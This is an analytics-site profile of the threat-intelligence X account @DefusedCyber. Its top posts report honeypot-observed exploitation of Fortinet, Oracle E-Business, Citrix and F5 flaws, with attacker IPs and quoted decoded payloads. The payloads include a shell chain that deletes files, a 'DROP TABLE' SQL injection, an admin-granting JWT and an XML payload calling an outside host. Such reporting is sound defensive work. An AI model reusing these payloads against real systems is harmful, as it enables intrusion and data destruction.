[GUEST ACCESS MODE: Data is scrambled or limited to provide examples. Make requests using your API key to unlock full data. Check https://lunarcrush.ai/auth for authentication information.]

# ![@DefusedCyber Avatar](https://lunarcrush.com/gi/w:26/cr:twitter::1686989812702617600.png) @DefusedCyber Defused

Defused posts on X about oracle, rm, os, vulnerability the most. They currently have XXXXX followers and XX posts still getting attention that total XXXXX engagements in the last XX hours.

### Engagements: XXXXX [#](/creator/twitter::1686989812702617600/interactions)
![Engagements Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:interactions.svg)

- X Week XXXXXXX -XX%
- X Month XXXXXXX +356%
- X Year XXXXXXX +38,377%

### Mentions: XX [#](/creator/twitter::1686989812702617600/posts_active)
![Mentions Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:posts_active.svg)

- X Week XX +8.80%
- X Month XX +117%
- X Year XXX +2,450%

### Followers: XXXXX [#](/creator/twitter::1686989812702617600/followers)
![Followers Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:followers.svg)

- X Week XXXXX +15%
- X Month XXXXX +131%

### CreatorRank: XXXXXXX [#](/creator/twitter::1686989812702617600/influencer_rank)
![CreatorRank Line Chart](https://lunarcrush.com/gi/w:600/cr:twitter::1686989812702617600/c:line/m:influencer_rank.svg)

### Social Influence [#](/creator/twitter::1686989812702617600/influence)
---

**Social category influence**
[technology brands](/list/technology-brands)  XXXX% [stocks](/list/stocks)  XXXX% [countries](/list/countries)  XXXX%

**Social topic influence**
[oracle](/topic/oracle) #192, [rm](/topic/rm) 2.44%, [os](/topic/os) 2.44%, [vulnerability](/topic/vulnerability) #57, [over the](/topic/over-the) 2.44%, [sweden](/topic/sweden) 2.44%, [infrastructure](/topic/infrastructure) 2.44%, [targets](/topic/targets) 2.44%, [has been](/topic/has-been) 2.44%, [$cmd](/topic/$cmd) XXXX%

**Top accounts mentioned or mentioned by**
[@simokohonen](/creator/undefined) [@bethelegwu](/creator/undefined) [@elegantgent12](/creator/undefined) [@ncastro19034713](/creator/undefined) [@kindnessuae](/creator/undefined)
### Top Social Posts [#](/creator/twitter::1686989812702617600/posts)
---
Top posts by engagements in the last XX hours

"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 169.150.198.85 ( Datacamp Limited ) VirusTotal Detections: X / XX 🟢 Exploit attempts to add a "prof_admin" user - a built-in access level in Fortinet devices that grants broad administrative permissions"  
[X Link](https://x.com/DefusedCyber/status/1976546196681535848) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-10T07:11Z 2914 followers, 9929 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 146.70.44.192 ( M247 Europe SRL ) VirusTotal Detections 0/95 🟢 Actor hit multiple Oracle E-Business honeypots in a short timeframe"  
[X Link](https://x.com/DefusedCyber/status/1978801348352131257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T12:33Z 2914 followers, 1522 engagements


"Actor mass exploiting CVE-2025-25257 (Critical FortiWeb SQLi) from 213.138.72.10 ( Limited Liability Company TTK-Svyaz ) VirusTotal Detections: 0/95 🟢 The actor exploited multiple honeypots across a short timeframe (1 hour)"  
[X Link](https://x.com/DefusedCyber/status/1978132533733667309) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 2912 followers, 7792 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 128.199.107.129 ( DigitalOcean ASN) VirusTotal Detections 0/95 🟢 The actor exploited multiple Oracle honeypots within the span of one minute"  
[X Link](https://x.com/DefusedCyber/status/1976170676051640584) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-09T06:19Z 2913 followers, 2840 engagements


"Actor exploiting CVE-2025-25257 (Critical FortiWeb SQL Injection Vulnerability) from 139.162.82.104 ( Akamai Connected Cloud ) VirusTotal Detections: 0/95 🟢 Decoded Payload 📸 #/bin/sh printf "Content-Type: text/htmlrn"; printf "rn"; eval $ HTTP_USER_AGENT import os # os.system('chmod +x /migadmin/cgi-bin/x.cgi && rm -f /var/log/lib/python3.10/pylab.py') #"  
[X Link](https://x.com/DefusedCyber/status/1976339547328766053) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-09T17:30Z 2912 followers, 11.2K engagements


"A Few Exploits Captured Over the Weekend 🧨 95.143.193.150 ( Internetport Sweden AB ) Exploiting CVE-2025-25257 (FortiWeb SQLi) 146.56.116.119 ( ORACLE-BMC-31898 ) Exploiting CVE-2025-5777 (CitrixBleed 2) 146.70.166.212 ( M247 Europe SRL ) Exploiting CVE-2025-61882 (Oracle E-Business RCE) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977415061598564830) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-12T16:44Z 2912 followers, 11.5K engagements


"Exploitation of Oracle E-Business RCE CVE-2025-61882 continues to be active: 139.180.218.167 ( AS-VULTR ) 37.221.127.41 ( Pq Hosting Plus S.r.l. ) 5.180.24.171 ( WorkTitans B.V. ) All 0/95 on VirusTotal 🟢"  
[X Link](https://x.com/DefusedCyber/status/1977735733893796007) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T13:58Z 2913 followers, 2300 engagements


"For a limited time deploy a FortiWeb decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1978132689824735240) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-14T16:15Z 2913 followers, XXX engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 23.234.102.176 ( TZULO ) VirusTotal Detections 0/95 🟢 The actor exploited multiple Oracle E-Business honeypots within a short timeframe 🎯"  
[X Link](https://x.com/DefusedCyber/status/1978361081803178471) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T07:23Z 2913 followers, 1815 engagements


"Actor exploiting CVE-2025-52970 (FortiWeb Authentication Bypass) from 182.8.97.131 ( PT. Telekomunikasi Selular) VirusTotal Detections: 0/95 🟢 This vulnerability has not yet entered known exploitation by CISA but exploits have hit honeypots since late August"  
[X Link](https://x.com/DefusedCyber/status/1978438709335703596) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T12:32Z 2913 followers, 2370 engagements


"Actor exploiting CVE-2025-25257 (FortiWeb SQLi) from 216.245.184.99 ( BLNWX ) VirusTotal Detections: 0/95 🟢 Payload 📸 Authorization: Bearer ';DROP/**/TABLE/**/fabric_user.a;--"  
[X Link](https://x.com/DefusedCyber/status/1979161102349934734) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T12:22Z 2914 followers, 68.1K engagements


"Multiple actors mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) 194.127.167.106 ( Owl Limited ) 83.143.242.45 ( M247 Europe SRL ) Both actors exploited multiple Oracle honeypots simultaneously during a short time duration (within XX minutes) 🎯"  
[X Link](https://x.com/DefusedCyber/status/1979263668186681358) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-17T19:10Z 2913 followers, 3100 engagements


"🚨 Defused users are seeing targeted exploits for F5 BIG-IP honeypots The recent F5 breach may cause more active exploitation against F5 infrastructure - more fresh intel For a limited time deploy a F5 BIG-IP decoy / honeypot for FREE 👉"  
[X Link](https://x.com/DefusedCyber/status/1979614594600681834) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-18T18:24Z 2914 followers, 3779 engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 206.237.15.245 ( MOACK .Co. LTD ) VirusTotal Detections: 0/95 🟢 This actor exploited multiple Netscaler honeypots using CVE-2025-5777 within a span of XX minutes"  
[X Link](https://x.com/DefusedCyber/status/1979899080928329760) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T13:15Z 2914 followers, XXX engagements


"⚠Elevated probing of CVE-2025-32756 (buffer overflow in multiple Fortinet products) Attackers looking to exploit this vulnerability use the /module/admin.fe path to enumerate targets Associated IPs from the past X days: 31.170.22.86 178.17.172.98 143.244.63.95 143.244.33.80"  
[X Link](https://x.com/DefusedCyber/status/1973434297685283100) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-01T17:06Z 2910 followers, 5625 engagements


"Mass exploitation of CVE-2025-25257 (FortiWeb critical pre-auth SQL injection) From 106.222.203.214 ( Bharti Airtel Ltd. Telemedia Services ) VirusTotal Detections: 0/95 🟢 Actor exploited multiple honeypots within a 3-minute timeframe"  
[X Link](https://x.com/DefusedCyber/status/1974904306064322895) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-05T18:27Z 2877 followers, 7469 engagements


"0-Day Alert 🚨 Actor exploiting Oracle E-Business Suite zero-day (CVE-2025-61882). Exploitation has been confirmed and patches are available now. No PoC observed as of today. We have added an Oracle E-Business honeypot for Defused Free users for a limited time - take advantage 🍯"  
[X Link](https://x.com/DefusedCyber/status/1975086414803898683) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-06T06:31Z 2871 followers, 15.6K engagements


"⚠Unknown Fortinet exploit (possibly a CVE-2022-40684 variant) from 64.95.13.8 ( BLNWX ) VirusTotal Detections: 0/95 🟢 JWT payload translates into: "username": "admin" "profname": "prof_admin" "vdom": "root" "loginname": "admin""  
[X Link](https://x.com/DefusedCyber/status/1975242250373517373) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-06T16:50Z 2906 followers, 26.2K engagements


"Actor mass exploiting CVE-2022-21587 (Oracle E-Business Suite file upload vulnerability) from 82.112.237.244 (Hostinger International Limited) VirusTotal Detections 0/95 🟢 Decoded ZIP File Payload: 📸 use CGI; print CGI::header( -type = 'text/plain' ); my $cmd = "echo Nuclei-CVE-2022-21597"; print system($cmd); exit 0;"  
[X Link](https://x.com/DefusedCyber/status/1975654524753723846) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-07T20:08Z 2904 followers, 4343 engagements


"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.108.229.71 (Host Universal Pty Ltd) VirusTotal Detections 0/95 🟢 Exploit embeds an XSLT injection payload which attempts to read files from the server's filesystem Decoded payload in gist:"  
[X Link](https://x.com/DefusedCyber/status/1975802971091775881) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-08T05:58Z 2896 followers, 3027 engagements


"Actor exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 149.90.153.249 (Vodafone Portugal) VirusTotal Detections 0/95 🟢 Payload 📸 redirectFromJsp=1&getUiType=xml version="1.0" encoding="UTF-8" initialize param name="init_was_saved"test/param param name="return_url"http://https://testingebs.free.beeceptor.com/param param name="ui_def_id"0/param param name="config_effective_usage_id"0/param param name="ui_type"Applet/param /initialize"  
[X Link](https://x.com/DefusedCyber/status/1975878758105031145) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-08T10:59Z 2896 followers, 2956 engagements


"Ransomware vulns with highest exploit likelihood (past 30d): - CVE-2025-61882 (Oracle E-Busine.) +184037.21% - CVE-2021-26857 (Exchange On-Pre.) +384.58% - CVE-2021-27878 (Veritas Veritas.) +202.15% - CVE-2021-27877 (Veritas Veritas.) +183.71% - CVE-2021-27102 (Accellion File .) +38.22%"  
[X Link](https://x.com/DefusedCyber/status/1977709712561799257) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T12:15Z 2903 followers, 14.5K engagements


"⚠Yesterday Oracle released another remotely exploitable vulnerability for E-Business (CVE-2025-61884) Track exploitation using our Oracle E-Business honeypot:"  
[X Link](https://x.com/DefusedCyber/status/1977735737735889302) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-13T13:58Z 2903 followers, XXX engagements


"Actor mass exploiting CVE-2025-5777 (Citrix Netscaler CitrixBleed 2) from 158.179.174.140 ( ORACLE-BMC-31898 ) VirusTotal Detections: 0/95 🟢 This actor has exploited multiple honeypots within the past X days"  
[X Link](https://x.com/DefusedCyber/status/1978864766518018133) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T16:45Z 2912 followers, 1048 engagements


"Breach Alert 🚨 A nation-state actor has exfiltrated BIG-IP source code and other sensitive data from F5. F5 has released multiple patches but the impact remains unclear We have added the F5 Big-IP honeypot for Defused Free users for a limited time - take advantage 🍯"  
[X Link](https://x.com/DefusedCyber/status/1978494230155743441) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-15T16:12Z 2914 followers, 17.6K engagements


"🚨 Maximum Severity Adobe AEM vulnerability being exploited CISA warns that attackers are actively exploiting CVE-2025-54253 a CVSS XXXX vulnerability Patches are available. We have added an Adobe AEM honeypot for Defused Free users for a limited time - take advantage 🍯"  
[X Link](https://x.com/DefusedCyber/status/1978847475440988368) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-16T15:36Z 2914 followers, 2026 engagements


"Actor mass exploiting CVE-2025-61882 (Oracle E-Business Suite vulnerability) from 103.140.45.8 ( Hostcenter ) VirusTotal Detections 0/95 🟢 Actor exploited CVE-2025-61882 on four different Oracle honeypots within a 15-minute timeframe"  
[X Link](https://x.com/DefusedCyber/status/1979968035097018421) [@DefusedCyber](/creator/x/DefusedCyber) 2025-10-19T17:49Z 2914 followers, 1890 engagements